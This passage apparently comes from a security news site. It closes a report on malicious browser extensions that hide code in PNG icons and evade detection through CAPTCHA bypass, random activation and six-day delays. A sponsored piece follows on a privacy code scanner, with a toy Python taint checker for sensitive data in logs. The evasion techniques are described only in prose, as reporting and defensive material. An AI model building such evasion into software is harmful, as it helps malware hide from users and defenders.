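    Run it against an unpacked `.xpi` directory; any PNG with a non-zero trailer deserves a look regardless of the heuristic, because legitimate icons have no reason to carry bytes past IEND. SVG files are text and will legitimately trip the token check when they embed scripts, so treat hits there as a prompt to read the file rather than a verdict.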

    “Why would malware need to bypass CAPTCHAs? Because some of its operations, like the hidden iframe injections, trigger bot detection,” the researchers explained. “The malware needs to prove it’s ‘human’ to keep operating.”

    Besides probability checks, the add-ons also incorporate time-based delays that prevent the malware from activating until more than six days after installation. These layered evasion techniques make it harder to detect what’s going on behind the scenes.


    It’s worth emphasizing here that not all the extensions above use the same steganographic attack chain, but all of them exhibit the same behavior and communicate with the same command-and-control (C2) infrastructure, indicating it’s the work of a single threat actor or group that has experimented with different lures and methods.

    The development comes merely days after a popular VPN extension for Google Chrome and Microsoft Edge was caught secretly harvesting AI conversations from ChatGPT, Claude, and Gemini and exfiltrating them to data brokers. In August 2025, another Chrome extension named FreeVPN.One was observed collecting screenshots, system information, and users’ locations.

    “Free VPNs promise privacy, but nothing in life comes free,” Koi Security said. “Again and again, they deliver surveillance instead.”


    Source: thehackernews.com…

  • Why Data Security and Privacy Need to Start in Code


    Data Security and Privacy

    AI-assisted coding and AI app generation platforms have created an unprecedented surge in software development. Companies are now facing rapid growth in both the number of applications and the pace of change within those applications. Security and privacy teams are under significant pressure as the surface area they must cover is expanding quickly while their staffing levels remain largely unchanged.

    Existing data security and privacy solutions are too reactive for this new era. Many begin with data already collected in production, which is often too late. These solutions frequently miss hidden data flows to third-party and AI integrations, and for the data sinks they do cover, they help detect risks but do not prevent them. The question is whether many of these issues can instead be prevented early. The answer is yes: prevention is possible by embedding detection and governance controls directly into development. HoundDog.ai provides a privacy code scanner built for exactly this purpose.

    Data security and privacy issues that can be proactively addressed

    Sensitive data exposure in logs remains one of the most common and costly problems

    When sensitive data appears in logs, relying on DLP solutions is reactive, unreliable, and slow. Teams may spend weeks cleaning logs, identifying exposure across the systems that ingested them, and revising the code after the fact. These incidents often begin with simple developer oversights, such as using a tainted variable or printing an entire user object in a debug function. As engineering teams grow past 20 developers, keeping track of all code paths becomes difficult and these oversights become more frequent.

    Inaccurate or outdated data maps also drive considerable privacy risk

    A core requirement in GDPR and US Privacy Frameworks is the need to document processing activities with details about the types of personal data collected, processed, stored, and shared. Data maps then feed into mandatory privacy reports such as Records of Processing Activities (RoPA), Privacy Impact Assessments (PIA), and Data Protection Impact Assessments (DPIA). These reports must document the legal bases for processing, demonstrate compliance with data minimization and retention principles, and ensure that data subjects have transparency and can exercise their rights.

    In fast-moving environments, though, data maps quickly drift out of date. Traditional workflows in GRC tools require privacy teams to interview application owners repeatedly, a process that is both slow and error-prone. Important details are often missed, especially in companies with hundreds or thousands of code repositories.

    Production-focused privacy platforms provide only partial automation because they attempt to infer data flows based on data already stored in production systems. They often cannot see SDKs, abstractions, and integrations embedded in the code. These blind spots can lead to violations of data processing agreements or inaccurate disclosures in privacy notices. Since these platforms detect issues only after data is already flowing, they offer no proactive controls that prevent risky behavior in the first place.

    Another major challenge is the widespread experimentation with AI inside codebases

    Many companies have policies restricting AI services in their products. Yet when scanning their repositories, it is common to find AI-related SDKs such as LangChain or LlamaIndex in 5% to 10% of repositories. Privacy and security teams must then understand which data types are being sent to these AI systems and whether user notices and legal bases cover these flows. AI usage itself is not the problem. The issue arises when developers introduce AI without oversight. Without proactive technical enforcement, teams must retroactively investigate and document these flows, which is time-consuming and often incomplete. As AI integrations grow in number, the risk of noncompliance grows too.

    What is HoundDog.ai

    HoundDog.ai provides a privacy-focused static code scanner that continuously analyzes source code to document sensitive data flows across storage systems, AI integrations, and third-party services. The scanner identifies privacy risks and sensitive data leaks early in development, before code is merged and before data is ever processed. The engine is built in Rust, which is memory safe, and it is lightweight and fast. It scans millions of lines of code in under a minute. The scanner was recently integrated with Replit, the AI app generation platform used by 45M creators, providing visibility into privacy risks across the millions of applications generated by the platform.

    Key capabilities

    AI Governance and Third-Party Risk Management

    Identify AI and third-party integrations embedded in code with high confidence, including hidden libraries and abstractions often associated with shadow AI.

    Proactive Sensitive Data Leak Detection

    Embed privacy across all stages in development, from IDE environments, with extensions available for VS Code, IntelliJ, Cursor, and Eclipse, to CI pipelines that use direct source code integrations and automatically push CI configurations as direct commits or pull requests requiring approval. Track more than 100 types of sensitive data, including Personally Identifiable Information (PII), Protected Health Information (PHI), Cardholder Data (CHD), and authentication tokens, and follow them across transformations into risky sinks such as LLM prompts, logs, files, local storage, and third-party SDKs.

    Evidence Generation for Privacy Compliance

    Automatically generate evidence-based data maps that show how sensitive data is collected, processed, and shared. Produce audit-ready Records of Processing Activities (RoPA), Privacy Impact Assessments (PIA), and Data Protection Impact Assessments (DPIA), prefilled with detected data flows and privacy risks identified by the scanner.

    Why this matters

    Companies need to eliminate blind spots

    A privacy scanner that works at the code level provides visibility into integrations and abstractions that production tools miss. This includes hidden SDKs, third-party libraries, and AI frameworks that never show up through production scans until it is too late.

    Teams also need to catch privacy risks before they occur

    Plaintext authentication tokens or sensitive data in logs, or unapproved data sent to third-party integrations, must be stopped at the source. Prevention is the only reliable way to avoid incidents and compliance gaps.

    Privacy teams require accurate and continuously updated data maps

    Automated generation of RoPAs, PIAs, and DPIAs based on code evidence ensures that documentation keeps pace with development, without repeated manual interviews or spreadsheet updates.

    Comparison with other tools

    Privacy and security engineering teams use a mix of tools, but each category has fundamental limitations.

    General-purpose static analysis tools provide custom rules but lack privacy awareness. They treat different sensitive data types as equivalent and cannot understand modern AI-driven data flows. They rely on simple pattern matching, which produces noisy alerts and requires constant maintenance. They also lack any built-in compliance reporting.

    Post-deployment privacy platforms map data flows based on information stored in production systems. They cannot detect integrations or flows that have not yet produced data in those systems and cannot see abstractions hidden in code. Because they operate after deployment, they cannot prevent risks and introduce a significant delay between issue introduction and detection.

    Reactive Data Loss Prevention tools intervene only after data has leaked. They lack visibility into source code and cannot identify root causes. When sensitive data reaches logs or transmissions, the cleanup is slow. Teams often spend weeks remediating and reviewing exposure across many systems.

    HoundDog.ai improves on these approaches by introducing a static analysis engine purpose-built for privacy. It performs deep interprocedural analysis across files and functions to trace sensitive data such as Personally Identifiable Information (PII), Protected Health Information (PHI), Cardholder Data (CHD), and authentication tokens. It understands transformations, sanitization logic, and control flow. It identifies when data reaches risky sinks such as logs, files, local storage, third-party SDKs, and LLM prompts. It prioritizes issues based on sensitivity and actual risk rather than simple patterns. It includes native support for more than 100 sensitive data types and allows customization.
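    To make the log-leak scenario from the earlier section and the sink and sanitizer tracing described here concrete, the following Python example implements a toy intra-procedural taint check over the Python AST. It is added for this page and is not HoundDog.ai’s engine: the sensitive field names, sink names, sanitizer names and the sample source it scans are all assumptions constructed for the demonstration, and unlike the product it does no cross-function tracing and cannot tell that printing a whole user object dumps PII.

```python
import ast

# Assumed vocabularies for the demonstration. The page says HoundDog tracks more
# than 100 sensitive data types; a real scanner carries a far larger inventory.
SENSITIVE_FIELDS = {"email", "ssn", "password", "phone", "card_number", "token"}
LOG_SINKS = {"debug", "info", "warning", "error", "critical", "exception", "print"}
SANITIZERS = {"redact", "mask", "hash_pii"}


class LogTaintScanner(ast.NodeVisitor):
    """Flag logging calls whose arguments derive from a sensitive field.

    Taint enters via attribute or key access on a sensitive name, propagates
    through assignment (f-strings and % formatting included, since they are
    just expression trees), and is cleared by a sanitizer call or by
    overwriting the variable with clean data. Scope is per function only.
    """

    def __init__(self) -> None:
        self.tainted: dict = {}      # variable name -> why it is sensitive
        self.findings: list = []     # (line, sink name, reason)

    def _reason(self, node: ast.AST):
        """Return a short explanation if the expression carries sensitive data."""
        if isinstance(node, ast.Call):
            f = node.func
            name = f.id if isinstance(f, ast.Name) else getattr(f, "attr", None)
            if name in SANITIZERS:
                return None                              # sanitized: stop here
        if isinstance(node, ast.Attribute) and node.attr in SENSITIVE_FIELDS:
            return f"attribute .{node.attr}"
        if (isinstance(node, ast.Subscript) and isinstance(node.slice, ast.Constant)
                and node.slice.value in SENSITIVE_FIELDS):
            return f"key {node.slice.value!r}"
        if isinstance(node, ast.Name) and node.id in self.tainted:
            return self.tainted[node.id]
        for child in ast.iter_child_nodes(node):
            reason = self._reason(child)
            if reason:
                return reason
        return None

    def visit_FunctionDef(self, node: ast.FunctionDef) -> None:
        saved, self.tainted = self.tainted, {}           # fresh scope per function
        self.generic_visit(node)
        self.tainted = saved

    def visit_Assign(self, node: ast.Assign) -> None:
        reason = self._reason(node.value)
        for target in node.targets:
            if isinstance(target, ast.Name):
                if reason:
                    self.tainted[target.id] = reason
                else:
                    self.tainted.pop(target.id, None)    # overwritten with clean data
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        f = node.func
        sink = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", None)
        if sink in LOG_SINKS:
            for arg in node.args + [kw.value for kw in node.keywords]:
                reason = self._reason(arg)
                if reason:
                    self.findings.append((node.lineno, sink, reason))
                    break
        self.generic_visit(node)


def scan_source(src: str) -> list:
    """Parse Python source and return [(line, sink, reason), ...]."""
    scanner = LogTaintScanner()
    scanner.visit(ast.parse(src))
    return scanner.findings


# Constructed sample, not customer code: two leaks, two clean log lines.
SAMPLE_SOURCE = '''\
import logging
log = logging.getLogger(__name__)

def on_login(user, req):
    email = user.email
    log.info("login attempt for %s", email)        # leak: tainted variable
    log.debug(f"raw body: {req['password']}")       # leak: sensitive key
    safe = redact(user.email)
    log.info("login ok for %s", safe)               # clean: sanitized
    token = req["token"]
    token = "<hidden>"
    log.warning("token=%s", token)                  # clean: overwritten
'''

if __name__ == "__main__":
    for line, sink, reason in scan_source(SAMPLE_SOURCE):
        print(f"line {line}: {sink}() receives sensitive data ({reason})")
```

    The two things worth copying from this toy into a real rule set are the sanitizer short-circuit (a `redact()` call stops propagation, so the clean log line is not flagged) and the overwrite rule (reassigning `token` to a constant clears its taint); without both, a pattern-matching grep produces exactly the noisy alerts the section above complains about.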

    HoundDog.ai also detects both direct and indirect AI integrations from source code. It identifies unsafe or unsanitized data flows into prompts and allows teams to enforce allowlists that define which data types may be used with AI services. This proactive model blocks unsafe prompt construction before code is merged, providing enforcement that runtime filters cannot match.

    Beyond detection, HoundDog.ai automates the creation of privacy documentation. It produces an always fresh inventory of internal and external data flows, storage locations, and third-party dependencies. It generates audit-ready Records of Processing Activities and Privacy Impact Assessments populated with real evidence and aligned to frameworks such as FedRAMP, DoD RMF, HIPAA, and NIST 800-53.

    Customer success

    HoundDog.ai is already used by Fortune 1000 companies across healthcare and financial services, scanning thousands of repositories. These organizations are reducing data mapping overhead, catching privacy issues early in development, and maintaining compliance without slowing engineering.

    Use case / Customer / Outcomes

    Slash Data Mapping Overhead (Fortune 500 Healthcare)
    • 70% reduction in data mapping. Automated reporting across 15,000 code repositories, eliminated manual corrections caused by missed flows from shadow AI and third-party integrations, and strengthened HIPAA compliance

    Minimize Sensitive Data Leaks in Logs (Unicorn Fintech)
    • Zero PII leaks across 500 code repos. Cut incidents from 5/month to none.
    • $2M savings by avoiding 6,000+ engineering hours and costly masking tools.

    Continuous Compliance with DPAs Across AI and Third-Party Integrations (Series B Fintech)
    • Privacy compliance from day 1. Detected oversharing with LLMs, enforced allowlists, and auto-generated Privacy Impact Assessments, building customer trust.

    Replit

    The most visible deployment is in Replit, where the scanner helps protect the more than 45M users of the AI app generation platform. It identifies privacy risks and traces sensitive data flows across millions of AI-generated applications. This allows Replit to embed privacy directly into its app generation workflow so that privacy becomes a core feature rather than an afterthought.

    By shifting privacy into the earliest stages of development and providing continuous visibility, enforcement, and documentation, HoundDog.ai makes it possible for teams to build secure and compliant software at the speed that modern AI-driven development demands.

    This article is a contributed piece from one of our valued partners.


    Source: thehackernews.com…